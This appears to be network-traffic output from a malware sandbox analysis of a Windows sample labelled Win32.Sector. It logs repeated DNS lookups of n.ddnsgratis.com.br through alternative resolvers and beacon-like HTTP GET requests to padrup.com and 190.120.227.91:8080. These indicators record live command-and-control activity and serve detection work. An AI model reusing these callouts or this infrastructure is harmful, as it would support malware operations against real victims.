                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.393537998 CEST192.168.2.9178.17.170.1330x1c31Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.438450098 CEST192.168.2.9178.17.170.1330x1c31Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.517610073 CEST192.168.2.9178.17.170.1330x1c31Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.562433004 CEST192.168.2.91.1.1.10x5628Standard query (0)ns2.random.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.572911978 CEST192.168.2.9185.14.29.1400x28c2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.593374014 CEST192.168.2.9185.14.29.1400x28c2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.615030050 CEST192.168.2.9185.14.29.1400x28c2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.633680105 CEST192.168.2.9185.14.29.1400x28c2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.657876968 CEST192.168.2.9185.14.29.1400x28c2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.683927059 CEST192.168.2.91.1.1.10x3bafStandard query (0)anyone.dnsrec.meo.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.697835922 CEST192.168.2.91.1.1.10x9eacStandard query (0)ist.fellig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.728336096 CEST192.168.2.9178.63.145.2360xd365Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:20.781780005 CEST192.168.2.9178.63.145.2360xd365Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:21.787961006 CEST192.168.2.9178.63.145.2360xd365Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:23.831501961 CEST192.168.2.9178.63.145.2360xd365Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:27.863054991 CEST192.168.2.9178.63.145.2360xd365Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:31.956614971 CEST192.168.2.91.1.1.10xc993Standard query (0)civet.ziphaze.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:31.993000984 CEST192.168.2.91.1.1.10xbb1fStandard query (0)ns2.fr.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:32.004920959 CEST192.168.2.937.187.0.400x7f1aStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:33.019095898 CEST192.168.2.937.187.0.400x7f1aStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:34.173814058 CEST192.168.2.937.187.0.400x7f1aStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:36.207508087 CEST192.168.2.937.187.0.400x7f1aStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:40.610044956 CEST192.168.2.937.187.0.400x7f1aStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.680383921 CEST192.168.2.91.1.1.10x4637Standard query (0)ns1.sg.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.693070889 CEST192.168.2.9128.199.248.1050xbc53Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.006944895 CEST192.168.2.9128.199.248.1050xbc53Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.284589052 CEST192.168.2.9128.199.248.1050xbc53Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.566601038 CEST192.168.2.9128.199.248.1050xbc53Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.862570047 CEST192.168.2.9128.199.248.1050xbc53Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:46.677217007 CEST192.168.2.91.1.1.10x6759Standard query (0)ns1.nl.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:46.688342094 CEST192.168.2.995.85.9.860xac99Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:47.677342892 CEST192.168.2.995.85.9.860xac99Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:48.707534075 CEST192.168.2.995.85.9.860xac99Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.723176956 CEST192.168.2.995.85.9.860xac99Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:54.769339085 CEST192.168.2.995.85.9.860xac99Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:58.886259079 CEST192.168.2.98.8.8.80x6c3aStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
Oct 18, 2024 12:44:05.532147884 CEST | 192.168.2.9 | 1.1.1.1 | 0x2a20 | Standard query (0) | ns.dotbit.me | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:05.743879080 CEST | 192.168.2.9 | 1.1.1.1 | 0x7944 | Standard query (0) | alors.deepdns.cryptostorm.net | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:05.910610914 CEST | 192.168.2.9 | 1.1.1.1 | 0xe761 | Standard query (0) | onyx.deepdns.cryptostorm.net | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:06.126422882 CEST | 192.168.2.9 | 1.1.1.1 | 0x5ea2 | Standard query (0) | ns1.any.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:06.303280115 CEST | 192.168.2.9 | 1.1.1.1 | 0x122d | Standard query (0) | ns1.random.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:06.329195023 CEST | 192.168.2.9 | 178.17.170.133 | 0xf2b8 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:06.393614054 CEST | 192.168.2.9 | 178.17.170.133 | 0xf2b8 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:06.472259045 CEST | 192.168.2.9 | 178.17.170.133 | 0xf2b8 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:06.808763981 CEST | 192.168.2.9 | 178.17.170.133 | 0xf2b8 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:06.850502968 CEST | 192.168.2.9 | 178.17.170.133 | 0xf2b8 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:06.894366980 CEST | 192.168.2.9 | 1.1.1.1 | 0x87a5 | Standard query (0) | ns2.random.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:06.904562950 CEST | 192.168.2.9 | 185.14.29.140 | 0xbdc8 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:06.923754930 CEST | 192.168.2.9 | 185.14.29.140 | 0xbdc8 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:06.944577932 CEST | 192.168.2.9 | 185.14.29.140 | 0xbdc8 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:07.009167910 CEST | 192.168.2.9 | 185.14.29.140 | 0xbdc8 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:07.044723988 CEST | 192.168.2.9 | 185.14.29.140 | 0xbdc8 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:07.068959951 CEST | 192.168.2.9 | 1.1.1.1 | 0xda30 | Standard query (0) | anyone.dnsrec.meo.ws | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:07.086344004 CEST | 192.168.2.9 | 1.1.1.1 | 0x609f | Standard query (0) | ist.fellig.org | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:07.144649029 CEST | 192.168.2.9 | 178.63.145.236 | 0x329d | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:08.158703089 CEST | 192.168.2.9 | 178.63.145.236 | 0x329d | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:09.245842934 CEST | 192.168.2.9 | 178.63.145.236 | 0x329d | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:11.301722050 CEST | 192.168.2.9 | 178.63.145.236 | 0x329d | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:15.325527906 CEST | 192.168.2.9 | 178.63.145.236 | 0x329d | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:19.379733086 CEST | 192.168.2.9 | 1.1.1.1 | 0x3b3e | Standard query (0) | civet.ziphaze.com | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:19.444880962 CEST | 192.168.2.9 | 1.1.1.1 | 0x82bc | Standard query (0) | ns2.fr.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:19.461707115 CEST | 192.168.2.9 | 37.187.0.40 | 0xf2c | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:20.505163908 CEST | 192.168.2.9 | 37.187.0.40 | 0xf2c | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:21.641191006 CEST | 192.168.2.9 | 37.187.0.40 | 0xf2c | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:23.709696054 CEST | 192.168.2.9 | 37.187.0.40 | 0xf2c | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:27.743957043 CEST | 192.168.2.9 | 37.187.0.40 | 0xf2c | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:31.895919085 CEST | 192.168.2.9 | 1.1.1.1 | 0xfd75 | Standard query (0) | ns1.sg.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:32.029779911 CEST | 192.168.2.9 | 1.1.1.1 | 0xfd75 | Standard query (0) | ns1.sg.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:32.834800959 CEST | 192.168.2.9 | 128.199.248.105 | 0x201d | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:33.107023001 CEST | 192.168.2.9 | 128.199.248.105 | 0x201d | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:33.409229040 CEST | 192.168.2.9 | 128.199.248.105 | 0x201d | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:33.878577948 CEST | 192.168.2.9 | 128.199.248.105 | 0x201d | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:34.189891100 CEST | 192.168.2.9 | 128.199.248.105 | 0x201d | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:34.459676981 CEST | 192.168.2.9 | 1.1.1.1 | 0x12fb | Standard query (0) | ns1.nl.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:34.472408056 CEST | 192.168.2.9 | 95.85.9.86 | 0xa2ea | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:35.591125011 CEST | 192.168.2.9 | 95.85.9.86 | 0xa2ea | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:36.629070997 CEST | 192.168.2.9 | 95.85.9.86 | 0xa2ea | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:38.738105059 CEST | 192.168.2.9 | 95.85.9.86 | 0xa2ea | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:42.770468950 CEST | 192.168.2.9 | 95.85.9.86 | 0xa2ea | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:46.838177919 CEST | 192.168.2.9 | 8.8.8.8 | 0x1caa | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:53.617563009 CEST | 192.168.2.9 | 1.1.1.1 | 0x7485 | Standard query (0) | ns.dotbit.me | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:53.629956961 CEST | 192.168.2.9 | 1.1.1.1 | 0xa76 | Standard query (0) | alors.deepdns.cryptostorm.net | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:53.661932945 CEST | 192.168.2.9 | 1.1.1.1 | 0x1394 | Standard query (0) | onyx.deepdns.cryptostorm.net | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:53.704653978 CEST | 192.168.2.9 | 1.1.1.1 | 0xc99e | Standard query (0) | ns1.any.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:53.716046095 CEST | 192.168.2.9 | 1.1.1.1 | 0xe238 | Standard query (0) | ns1.random.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:53.746553898 CEST | 192.168.2.9 | 178.17.170.133 | 0x6dc2 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:53.815402031 CEST | 192.168.2.9 | 178.17.170.133 | 0x6dc2 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:53.862550020 CEST | 192.168.2.9 | 178.17.170.133 | 0x6dc2 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:53.910829067 CEST | 192.168.2.9 | 178.17.170.133 | 0x6dc2 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:53.957437038 CEST | 192.168.2.9 | 178.17.170.133 | 0x6dc2 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:54.004734039 CEST | 192.168.2.9 | 1.1.1.1 | 0x642 | Standard query (0) | ns2.random.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:54.018744946 CEST | 192.168.2.9 | 185.14.29.140 | 0xdc19 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:54.044097900 CEST | 192.168.2.9 | 185.14.29.140 | 0xdc19 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:54.081768990 CEST | 192.168.2.9 | 185.14.29.140 | 0xdc19 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:54.161009073 CEST | 192.168.2.9 | 185.14.29.140 | 0xdc19 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:54.207907915 CEST | 192.168.2.9 | 185.14.29.140 | 0xdc19 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:54.248543024 CEST | 192.168.2.9 | 1.1.1.1 | 0x4d4 | Standard query (0) | anyone.dnsrec.meo.ws | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:54.263775110 CEST | 192.168.2.9 | 1.1.1.1 | 0x1414 | Standard query (0) | ist.fellig.org | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:54.347028971 CEST | 192.168.2.9 | 1.1.1.1 | 0x1414 | Standard query (0) | ist.fellig.org | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:54.415359020 CEST | 192.168.2.9 | 178.63.145.236 | 0x458e | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:55.430516958 CEST | 192.168.2.9 | 178.63.145.236 | 0x458e | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:56.440752983 CEST | 192.168.2.9 | 178.63.145.236 | 0x458e | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:44:58.444480896 CEST | 192.168.2.9 | 178.63.145.236 | 0x458e | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:02.474888086 CEST | 192.168.2.9 | 178.63.145.236 | 0x458e | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:06.504868984 CEST | 192.168.2.9 | 1.1.1.1 | 0xe83c | Standard query (0) | civet.ziphaze.com | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:06.596029043 CEST | 192.168.2.9 | 1.1.1.1 | 0xe83c | Standard query (0) | civet.ziphaze.com | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:06.604376078 CEST | 192.168.2.9 | 1.1.1.1 | 0x5bc | Standard query (0) | ns2.fr.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:06.614948988 CEST | 192.168.2.9 | 37.187.0.40 | 0x45c3 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:07.635962963 CEST | 192.168.2.9 | 37.187.0.40 | 0x45c3 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:08.643780947 CEST | 192.168.2.9 | 37.187.0.40 | 0x45c3 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:10.658979893 CEST | 192.168.2.9 | 37.187.0.40 | 0x45c3 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:14.840624094 CEST | 192.168.2.9 | 37.187.0.40 | 0x45c3 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:18.911434889 CEST | 192.168.2.9 | 1.1.1.1 | 0x40d8 | Standard query (0) | ns1.sg.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:18.941973925 CEST | 192.168.2.9 | 128.199.248.105 | 0xc63b | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:19.252859116 CEST | 192.168.2.9 | 128.199.248.105 | 0xc63b | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:19.550877094 CEST | 192.168.2.9 | 128.199.248.105 | 0xc63b | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:19.875459909 CEST | 192.168.2.9 | 128.199.248.105 | 0xc63b | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:20.206214905 CEST | 192.168.2.9 | 128.199.248.105 | 0xc63b | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:20.525527954 CEST | 192.168.2.9 | 1.1.1.1 | 0x3599 | Standard query (0) | ns1.nl.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:20.611905098 CEST | 192.168.2.9 | 1.1.1.1 | 0x3599 | Standard query (0) | ns1.nl.dns.d0wn.biz | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:20.621762037 CEST | 192.168.2.9 | 95.85.9.86 | 0x4890 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:21.644077063 CEST | 192.168.2.9 | 95.85.9.86 | 0x4890 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:22.660218000 CEST | 192.168.2.9 | 95.85.9.86 | 0x4890 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
Oct 18, 2024 12:45:24.776211023 CEST | 192.168.2.9 | 95.85.9.86 | 0x4890 | Standard query (0) | n.ddnsgratis.com.br | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.944122076 CEST192.168.2.995.85.9.860x4890Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:32.989737034 CEST192.168.2.98.8.8.80xc139Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
• padrup.com
• 190.120.227.91:8080
• n.ddnsgratis.com.br
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49707 | 185.53.178.50 | 80 | 1376 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:41:33.815658092 CEST | 152 | OUT | GET /sobaka1.gif?72f523=7533859 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:41:34.964721918 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:41:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_DaLa3woffRVuyipr4nQUWn4DngEfXMQqc3XCLKLUOwo3I357jjocgZl87QSesErYw/t2hxsI4T7L+9eXKW6euA==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 31 66 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 1f0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:41:34.964740992 CEST | 1236 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODA5NC42MTA5OjZjMGU1YzNjYTRjNjI2NDc5OGZiOWNjNzYzYmFmZmE2MjJkOTExNGFhNjdlNTNlMGVjM2NiMzVlNDUwNGI06e9NTc6NjcxMjNiNWU5NTI
Oct 18, 2024 12:41:34.964755058 CEST | 424 | IN | Data Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }
Oct 18, 2024 12:41:34.964934111 CEST | 340 | IN | Data Raw: 35 35 34 66 63 36 30 34 33 34 33 34 34 39 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
Data Ascii: 554fc604343449');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49709 | 190.120.227.91 | 8080 | 1376 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:41:35.927814960 CEST | 166 | OUT | GET /sobakavolos.gif?74d2bd=76561250 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


